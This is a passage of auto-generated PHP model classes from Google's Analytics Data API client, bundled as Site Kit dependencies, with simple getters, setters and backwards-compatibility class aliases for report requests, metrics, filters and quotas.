/** * @return DimensionExpression */ public function getDimensionExpression() { return $this->dimensionExpression; } /** * @param string */ public function setName($name) { $this->name = $name; } /** * @return string */ public function getName() { return $this->name; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\Dimension::class, 'Google\\Site_Kit_Dependencies\\Google_Service_AnalyticsData_Dimension'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\AnalyticsData; class BatchRunReportsResponse extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'reports'; /** * @var string */ public $kind; protected $reportsType = \Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\RunReportResponse::class; protected $reportsDataType = 'array'; /** * @param string */ public function setKind($kind) { $this->kind = $kind; } /** * @return string */ public function getKind() { return $this->kind; } /** * @param RunReportResponse[] */ public function setReports($reports) { $this->reports = $reports; } /** * @return RunReportResponse[] */ public function getReports() { return $this->reports; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\BatchRunReportsResponse::class, 'Google\\Site_Kit_Dependencies\\Google_Service_AnalyticsData_BatchRunReportsResponse'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\AnalyticsData; class RunReportRequest extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'orderBys'; protected $cohortSpecType = \Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\CohortSpec::class; protected $cohortSpecDataType = ''; /** * @var string */ public $currencyCode; protected $dateRangesType = \Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\DateRange::class; protected $dateRangesDataType = 'array'; protected $dimensionFilterType = \Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\FilterExpression::class; protected $dimensionFilterDataType = ''; protected $dimensionsType = \Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\Dimension::class; protected $dimensionsDataType = 'array'; /** * @var bool */ public $keepEmptyRows; /** * @var string */ public $limit; /** * @var string[] */ public $metricAggregations; protected $metricFilterType = \Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\FilterExpression::class; protected $metricFilterDataType = ''; protected $metricsType = \Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\Metric::class; protected $metricsDataType = 'array'; /** * @var string */ public $offset; protected $orderBysType = \Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\OrderBy::class; protected $orderBysDataType = 'array'; /** * @var string */ public $property; /** * @var bool */ public $returnPropertyQuota; /** * @param CohortSpec */ public function setCohortSpec(\Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\CohortSpec $cohortSpec) { $this->cohortSpec = $cohortSpec; } /** * @return CohortSpec */ public function getCohortSpec() { return $this->cohortSpec; } /** * @param string */ public function setCurrencyCode($currencyCode) { $this->currencyCode = $currencyCode; } /** * @return string */ public function getCurrencyCode() { return $this->currencyCode; } /** * @param DateRange[] */ public function setDateRanges($dateRanges) { $this->dateRanges = $dateRanges; } /** * @return DateRange[] */ public function getDateRanges() { return $this->dateRanges; } /** * @param FilterExpression */ public function setDimensionFilter(\Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\FilterExpression $dimensionFilter) { $this->dimensionFilter = $dimensionFilter; } /** * @return FilterExpression */ public function getDimensionFilter() { return $this->dimensionFilter; } /** * @param Dimension[] */ public function setDimensions($dimensions) { $this->dimensions = $dimensions; } /** * @return Dimension[] */ public function getDimensions() { return $this->dimensions; } /** * @param bool */ public function setKeepEmptyRows($keepEmptyRows) { $this->keepEmptyRows = $keepEmptyRows; } /** * @return bool */ public function getKeepEmptyRows() { return $this->keepEmptyRows; } /** * @param string */ public function setLimit($limit) { $this->limit = $limit; } /** * @return string */ public function getLimit() { return $this->limit; } /** * @param string[] */ public function setMetricAggregations($metricAggregations) { $this->metricAggregations = $metricAggregations; } /** * @return string[] */ public function getMetricAggregations() { return $this->metricAggregations; } /** * @param FilterExpression */ public function setMetricFilter(\Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\FilterExpression $metricFilter) { $this->metricFilter = $metricFilter; } /** * @return FilterExpression */ public function getMetricFilter() { return $this->metricFilter; } /** * @param Metric[] */ public function setMetrics($metrics) { $this->metrics = $metrics; } /** * @return Metric[] */ public function getMetrics() { return $this->metrics; } /** * @param string */ public function setOffset($offset) { $this->offset = $offset; } /** * @return string */ public function getOffset() { return $this->offset; } /** * @param OrderBy[] */ public function setOrderBys($orderBys) { $this->orderBys = $orderBys; } /** * @return OrderBy[] */ public function getOrderBys() { return $this->orderBys; } /** * @param string */ public function setProperty($property) { $this->property = $property; } /** * @return string */ public function getProperty() { return $this->property; } /** * @param bool */ public function setReturnPropertyQuota($returnPropertyQuota) { $this->returnPropertyQuota = $returnPropertyQuota; } /** * @return bool */ public function getReturnPropertyQuota() { return $this->returnPropertyQuota; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\RunReportRequest::class, 'Google\\Site_Kit_Dependencies\\Google_Service_AnalyticsData_RunReportRequest'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\AnalyticsData; class BatchRunPivotReportsResponse extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'pivotReports'; /** * @var string */ public $kind; protected $pivotReportsType = \Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\RunPivotReportResponse::class; protected $pivotReportsDataType = 'array'; /** * @param string */ public function setKind($kind) { $this->kind = $kind; } /** * @return string */ public function getKind() { return $this->kind; } /** * @param RunPivotReportResponse[] */ public function setPivotReports($pivotReports) { $this->pivotReports = $pivotReports; } /** * @return RunPivotReportResponse[] */ public function getPivotReports() { return $this->pivotReports; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\BatchRunPivotReportsResponse::class, 'Google\\Site_Kit_Dependencies\\Google_Service_AnalyticsData_BatchRunPivotReportsResponse'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\AnalyticsData; class NumericValue extends \Google\Site_Kit_Dependencies\Google\Model { public $doubleValue; /** * @var string */ public $int64Value; public function setDoubleValue($doubleValue) { $this->doubleValue = $doubleValue; } public function getDoubleValue() { return $this->doubleValue; } /** * @param string */ public function setInt64Value($int64Value) { $this->int64Value = $int64Value; } /** * @return string */ public function getInt64Value() { return $this->int64Value; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\NumericValue::class, 'Google\\Site_Kit_Dependencies\\Google_Service_AnalyticsData_NumericValue'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\AnalyticsData; class FilterExpression extends \Google\Site_Kit_Dependencies\Google\Model { protected $andGroupType = \Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\FilterExpressionList::class; protected $andGroupDataType = ''; protected $filterType = \Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\Filter::class; protected $filterDataType = ''; protected $notExpressionType = \Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\FilterExpression::class; protected $notExpressionDataType = ''; protected $orGroupType = \Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\FilterExpressionList::class; protected $orGroupDataType = ''; /** * @param FilterExpressionList */ public function setAndGroup(\Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\FilterExpressionList $andGroup) { $this->andGroup = $andGroup; } /** * @return FilterExpressionList */ public function getAndGroup() { return $this->andGroup; } /** * @param Filter */ public function setFilter(\Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\Filter $filter) { $this->filter = $filter; } /** * @return Filter */ public function getFilter() { return $this->filter; } /** * @param FilterExpression */ public function setNotExpression(\Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\FilterExpression $notExpression) { $this->notExpression = $notExpression; } /** * @return FilterExpression */ public function getNotExpression() { return $this->notExpression; } /** * @param FilterExpressionList */ public function setOrGroup(\Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\FilterExpressionList $orGroup) { $this->orGroup = $orGroup; } /** * @return FilterExpressionList */ public function getOrGroup() { return $this->orGroup; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\FilterExpression::class, 'Google\\Site_Kit_Dependencies\\Google_Service_AnalyticsData_FilterExpression'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\AnalyticsData; class PivotSelection extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var string */ public $dimensionName; /** * @var string */ public $dimensionValue; /** * @param string */ public function setDimensionName($dimensionName) { $this->dimensionName = $dimensionName; } /** * @return string */ public function getDimensionName() { return $this->dimensionName; } /** * @param string */ public function setDimensionValue($dimensionValue) { $this->dimensionValue = $dimensionValue; } /** * @return string */ public function getDimensionValue() { return $this->dimensionValue; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\PivotSelection::class, 'Google\\Site_Kit_Dependencies\\Google_Service_AnalyticsData_PivotSelection'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\AnalyticsData; class ConcatenateExpression extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'dimensionNames'; /** * @var string */ public $delimiter; /** * @var string[] */ public $dimensionNames; /** * @param string */ public function setDelimiter($delimiter) { $this->delimiter = $delimiter; } /** * @return string */ public function getDelimiter() { return $this->delimiter; } /** * @param string[] */ public function setDimensionNames($dimensionNames) { $this->dimensionNames = $dimensionNames; } /** * @return string[] */ public function getDimensionNames() { return $this->dimensionNames; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\ConcatenateExpression::class, 'Google\\Site_Kit_Dependencies\\Google_Service_AnalyticsData_ConcatenateExpression'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\AnalyticsData; class MetricHeader extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var string */ public $name; /** * @var string */ public $type; /** * @param string */ public function setName($name) { $this->name = $name; } /** * @return string */ public function getName() { return $this->name; } /** * @param string */ public function setType($type) { $this->type = $type; } /** * @return string */ public function getType() { return $this->type; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\MetricHeader::class, 'Google\\Site_Kit_Dependencies\\Google_Service_AnalyticsData_MetricHeader'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\AnalyticsData; class Metric extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var string */ public $expression; /** * @var bool */ public $invisible; /** * @var string */ public $name; /** * @param string */ public function setExpression($expression) { $this->expression = $expression; } /** * @return string */ public function getExpression() { return $this->expression; } /** * @param bool */ public function setInvisible($invisible) { $this->invisible = $invisible; } /** * @return bool */ public function getInvisible() { return $this->invisible; } /** * @param string */ public function setName($name) { $this->name = $name; } /** * @return string */ public function getName() { return $this->name; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\Metric::class, 'Google\\Site_Kit_Dependencies\\Google_Service_AnalyticsData_Metric'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\AnalyticsData; class AudienceExport extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'dimensions'; /** * @var string */ public $audience; /** * @var string */ public $audienceDisplayName; /** * @var string */ public $beginCreatingTime; /** * @var int */ public $creationQuotaTokensCharged; protected $dimensionsType = \Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\V1betaAudienceDimension::class; protected $dimensionsDataType = 'array'; /** * @var string */ public $errorMessage; /** * @var string */ public $name; public $percentageCompleted; /** * @var int */ public $rowCount; /** * @var string */ public $state; /** * @param string */ public function setAudience($audience) { $this->audience = $audience; } /** * @return string */ public function getAudience() { return $this->audience; } /** * @param string */ public function setAudienceDisplayName($audienceDisplayName) { $this->audienceDisplayName = $audienceDisplayName; } /** * @return string */ public function getAudienceDisplayName() { return $this->audienceDisplayName; } /** * @param string */ public function setBeginCreatingTime($beginCreatingTime) { $this->beginCreatingTime = $beginCreatingTime; } /** * @return string */ public function getBeginCreatingTime() { return $this->beginCreatingTime; } /** * @param int */ public function setCreationQuotaTokensCharged($creationQuotaTokensCharged) { $this->creationQuotaTokensCharged = $creationQuotaTokensCharged; } /** * @return int */ public function getCreationQuotaTokensCharged() { return $this->creationQuotaTokensCharged; } /** * @param V1betaAudienceDimension[] */ public function setDimensions($dimensions) { $this->dimensions = $dimensions; } /** * @return V1betaAudienceDimension[] */ public function getDimensions() { return $this->dimensions; } /** * @param string */ public function setErrorMessage($errorMessage) { $this->errorMessage = $errorMessage; } /** * @return string */ public function getErrorMessage() { return $this->errorMessage; } /** * @param string */ public function setName($name) { $this->name = $name; } /** * @return string */ public function getName() { return $this->name; } public function setPercentageCompleted($percentageCompleted) { $this->percentageCompleted = $percentageCompleted; } public function getPercentageCompleted() { return $this->percentageCompleted; } /** * @param int */ public function setRowCount($rowCount) { $this->rowCount = $rowCount; } /** * @return int */ public function getRowCount() { return $this->rowCount; } /** * @param string */ public function setState($state) { $this->state = $state; } /** * @return string */ public function getState() { return $this->state; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\AudienceExport::class, 'Google\\Site_Kit_Dependencies\\Google_Service_AnalyticsData_AudienceExport'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\AnalyticsData; class PivotHeader extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'pivotDimensionHeaders'; protected $pivotDimensionHeadersType = \Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\PivotDimensionHeader::class; protected $pivotDimensionHeadersDataType = 'array'; /** * @var int */ public $rowCount; /** * @param PivotDimensionHeader[] */ public function setPivotDimensionHeaders($pivotDimensionHeaders) { $this->pivotDimensionHeaders = $pivotDimensionHeaders; } /** * @return PivotDimensionHeader[] */ public function getPivotDimensionHeaders() { return $this->pivotDimensionHeaders; } /** * @param int */ public function setRowCount($rowCount) { $this->rowCount = $rowCount; } /** * @return int */ public function getRowCount() { return $this->rowCount; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\PivotHeader::class, 'Google\\Site_Kit_Dependencies\\Google_Service_AnalyticsData_PivotHeader'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\AnalyticsData; class CheckCompatibilityResponse extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'metricCompatibilities'; protected $dimensionCompatibilitiesType = \Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\DimensionCompatibility::class; protected $dimensionCompatibilitiesDataType = 'array'; protected $metricCompatibilitiesType = \Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\MetricCompatibility::class; protected $metricCompatibilitiesDataType = 'array'; /** * @param DimensionCompatibility[] */ public function setDimensionCompatibilities($dimensionCompatibilities) { $this->dimensionCompatibilities = $dimensionCompatibilities; } /** * @return DimensionCompatibility[] */ public function getDimensionCompatibilities() { return $this->dimensionCompatibilities; } /** * @param MetricCompatibility[] */ public function setMetricCompatibilities($metricCompatibilities) { $this->metricCompatibilities = $metricCompatibilities; } /** * @return MetricCompatibility[] */ public function getMetricCompatibilities() { return $this->metricCompatibilities; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\CheckCompatibilityResponse::class, 'Google\\Site_Kit_Dependencies\\Google_Service_AnalyticsData_CheckCompatibilityResponse'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\AnalyticsData; class SamplingMetadata extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var string */ public $samplesReadCount; /** * @var string */ public $samplingSpaceSize; /** * @param string */ public function setSamplesReadCount($samplesReadCount) { $this->samplesReadCount = $samplesReadCount; } /** * @return string */ public function getSamplesReadCount() { return $this->samplesReadCount; } /** * @param string */ public function setSamplingSpaceSize($samplingSpaceSize) { $this->samplingSpaceSize = $samplingSpaceSize; } /** * @return string */ public function getSamplingSpaceSize() { return $this->samplingSpaceSize; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\SamplingMetadata::class, 'Google\\Site_Kit_Dependencies\\Google_Service_AnalyticsData_SamplingMetadata'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\AnalyticsData; class PropertyQuota extends \Google\Site_Kit_Dependencies\Google\Model { protected $concurrentRequestsType = \Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\QuotaStatus::class; protected $concurrentRequestsDataType = ''; protected $potentiallyThresholdedRequestsPerHourType = \Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\QuotaStatus::class; protected $potentiallyThresholdedRequestsPerHourDataType = ''; protected $serverErrorsPerProjectPerHourType = \Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\QuotaStatus::class; protected $serverErrorsPerProjectPerHourDataType = ''; protected $tokensPerDayType = \Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\QuotaStatus::class; protected $tokensPerDayDataType = ''; protected $tokensPerHourType = \Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\QuotaStatus::class; protected $tokensPerHourDataType = ''; protected $tokensPerProjectPerHourType = \Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\QuotaStatus::class; protected $tokensPerProjectPerHourDataType = ''; /** * @param QuotaStatus */ public function setConcurrentRequests(\Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\QuotaStatus $concurrentRequests) { $this->concurrentRequests = $concurrentRequests; } /** * @return QuotaStatus */ public function getConcurrentRequests() { return $this->concurrentRequests; } /** * @param QuotaStatus */ public function setPotentiallyThresholdedRequestsPerHour(\Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\QuotaStatus $potentiallyThresholdedRequestsPerHour) { $this->potentiallyThresholdedRequestsPerHour = $potentiallyThresholdedRequestsPerHour; } /** * @return QuotaStatus */ public function getPotentiallyThresholdedRequestsPerHour() { return $this->potentiallyThresholdedRequestsPerHour; } /** * @param QuotaStatus */ public function setServerErrorsPerProjectPerHour(\Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\QuotaStatus $serverErrorsPerProjectPerHour) { $this->serverErrorsPerProjectPerHour = $serverErrorsPerProjectPerHour; } /** * @return QuotaStatus */ public function getServerErrorsPerProjectPerHour() { return $this->serverErrorsPerProjectPerHour; } /** * @param QuotaStatus */ public function setTokensPerDay(\Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\QuotaStatus $tokensPerDay) { $this->tokensPerDay = $tokensPerDay; } /** * @return QuotaStatus */ public function getTokensPerDay() { return $this->tokensPerDay; } /** * @param QuotaStatus */ public function setTokensPerHour(\Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\QuotaStatus $tokensPerHour) { $this->tokensPerHour = $tokensPerHour; } /** * @return QuotaStatus */ public function getTokensPerHour() { return $this->tokensPerHour; } /** * @param QuotaStatus */ public function setTokensPerProjectPerHour(\Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\QuotaStatus $tokensPerProjectPerHour) { $this->tokensPerProjectPerHour = $tokensPerProjectPerHour; } /** * @return QuotaStatus */ public function getTokensPerProjectPerHour() { return $this->tokensPerProjectPerHour; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\PropertyQuota::class, 'Google\\Site_Kit_Dependencies\\Google_Service_AnalyticsData_PropertyQuota'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\AnalyticsData; class BatchRunReportsRequest extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'requests'; protected $requestsType = \Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\RunReportRequest::class; protected $requestsDataType = 'array'; /** * @param RunReportRequest[] */ public function setRequests($requests) { $this->requests = $requests; } /** * @return RunReportRequest[] */ public function getRequests() { return $this->requests; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\BatchRunReportsRequest::class, 'Google\\Site_Kit_Dependencies\\Google_Service_AnalyticsData_BatchRunReportsRequest'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\AnalyticsData; class MetricValue extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var string */ public $value; /** * @param string */ public function setValue($value) { $this->value = $value; } /** * @return string */ public function getValue() { return $this->value; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\MetricValue::class, 'Google\\Site_Kit_Dependencies\\Google_Service_AnalyticsData_MetricValue'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\AnalyticsData; class MinuteRange extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var int */ public $endMinutesAgo; /** * @var string */ public $name; /** * @var int */ public $startMinutesAgo; /** * @param int */ public function setEndMinutesAgo($endMinutesAgo) { $this->endMinutesAgo = $endMinutesAgo; } /** * @return int */ public function getEndMinutesAgo() { return $this->endMinutesAgo; } /** * @param string */ public function setName($name) { $this->name = $name; } /** * @return string */ public function getName() { return $this->name; } /** * @param int */ public function setStartMinutesAgo($startMinutesAgo) { $this->startMinutesAgo = $startMinutesAgo; } /** * @return int */ public function getStartMinutesAgo() { return $this->startMinutesAgo; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\MinuteRange::class, 'Google\\Site_Kit_Dependencies\\Google_Service_AnalyticsData_MinuteRange'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\AnalyticsData; class StringFilter extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var bool */ public $caseSensitive; /** * @var string */ public $matchType; /** * @var string */ public $value; /** * @param bool */ public function setCaseSensitive($caseSensitive) { $this->caseSensitive = $caseSensitive; } /** * @return bool */ public function getCaseSensitive() { return $this->caseSensitive; } /** * @param string */ public function setMatchType($matchType) { $this->matchType = $matchType; } /** * @return string */ public function getMatchType() { return $this->matchType; } /** * @param string */ public function setValue($value) { $this->value = $value; } /** * @return string */ public function getValue() { return $this->value; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\StringFilter::class, 'Google\\Site_Kit_Dependencies\\Google_Service_AnalyticsData_StringFilter'); 